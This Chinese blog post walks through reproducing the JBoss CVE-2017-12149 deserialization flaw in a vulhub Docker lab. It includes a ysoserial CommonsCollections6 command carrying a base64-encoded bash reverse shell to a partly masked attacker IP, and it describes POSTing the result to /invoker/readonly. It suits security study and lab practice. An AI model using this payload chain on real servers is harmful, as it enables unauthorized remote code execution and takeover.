复现jboss CVE-2017-12149

简介: 参考文献:https://github.com/vulhub/vulhubhttps://github.com/vulhub/vulhub/tree/e9509e2893909c3147fc33e804c34fabdffbdf3b/jboss/CVE-2017-12149下载地址:vulhub安装vulhub环境:ubuntu16.

参考文献:https://github.com/vulhub/vulhub
https://github.com/vulhub/vulhub/tree/e9509e2893909c3147fc33e804c34fabdffbdf3b/jboss/CVE-2017-12149
下载地址:vulhub

安装vulhub

环境:

ubuntu16.04

curl -s https://bootstrap.pypa.io/get-pip.py | python3   #安装pip
curl -s https://get.docker.com/ | sh或
sudo apt install docker.io    # 安装最新版docker
service docker start   #启动docker服务
pip install docker-compose   #安装compose
docker version  #出现server和client的版本号则安装成功

安装vulhub
vulhub/activemq/cve-2016-3088/  #进入一个目录
docker-compose up -d #运行
docker-compose down #关闭

运行jboss测试环境

/vulhub/jboss/CVE-2017-12149# docker-compose up -d

初始化完成后访问http://xxx.xxx.xxx.xxx:8080/即可看到JBoss默认页面
通过ngrok来访问内网上的内容'/home/cws6/Desktop/ngrok' http 8080

漏洞复现

  • 该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化:
img_857e10315dab8fbd7086fbd0c2f5cf25.png

编写反弹shell的命令

  • 使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码。

工具:http://jackson.thuraisamy.me/runtime-exec-payloads.html

img_964696b002da382dc99a00f8a22c6a4b.png

序列化数据生成

  • 使用ysoserial生成序列化数据,由于Vulhub使用的Java版本较新,所以选择使用的gadgetCommonsCollections6
 java -jar ysoserial.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAxxxxxxxxxxxxxxxxxxxxxD4mMQ==}|{base64,-d}|{bash,-i}" > 3.ser

发送POC

  • 将生成好的3.ser文件作为POST Body发送至/invoker/readonly即可:
    img_7c15a6ca8568f201cead35a6241b80ce.png

    img_9e0a834dbe2bcb584c9d54f7fc6fc98f.png
    2.png

成功反弹shell:

img_2447b4df4b993b31379b8bb07ab71c68.png
目录
相关文章
|
4月前
|
应用服务中间件 PHP nginx
CVE-2019-11043 复现
CVE-2019-11043 复现
115 5
|
4月前
|
安全 网络安全 Apache
CVE-2021-41773 复现
CVE-2021-41773 复现
288 1
|
7月前
|
安全 Oracle 关系型数据库
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
|
开发框架 安全 Java
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
Spring Framework存在远程代码执行漏洞,攻击者可通过该漏洞执行系统命令。
465 1
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
|
安全 NoSQL Shell
Weblogic ssrf漏洞复现---从0到1
利用Ubuntu16.04,安装docker,要以root身份执行
303 0
Weblogic ssrf漏洞复现---从0到1
|
XML 安全 Oracle
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
160 0
|
XML 安全 Oracle
Weblogic IIOP协议反序列化(CVE-2020-2551)漏洞复现
Weblogic IIOP协议反序列化(CVE-2020-2551)漏洞复现
1348 0
|
安全 jenkins Java
CVE-2017-1000353 Jenkins漏洞复现系列(一)
Jenkins未授权远程代码执行漏洞, 允许攻击者将序列化的Java SignedObject对象传输给Jenkins CLI处理,反序列化ObjectInputStream作为Command对象,这将绕过基于黑名单的保护机制, 导致代码执行
841 0
|
安全 Shell 数据安全/隐私保护
CVE-2019-15107 Webmin RCE漏洞复现
环境搭建: 进入镜像目录
393 0
|
资源调度 安全 Ubuntu
CVE-2021-3560漏洞复现及原理分析
CVE-2021-3560漏洞复现及原理分析
282 0

热门文章

最新文章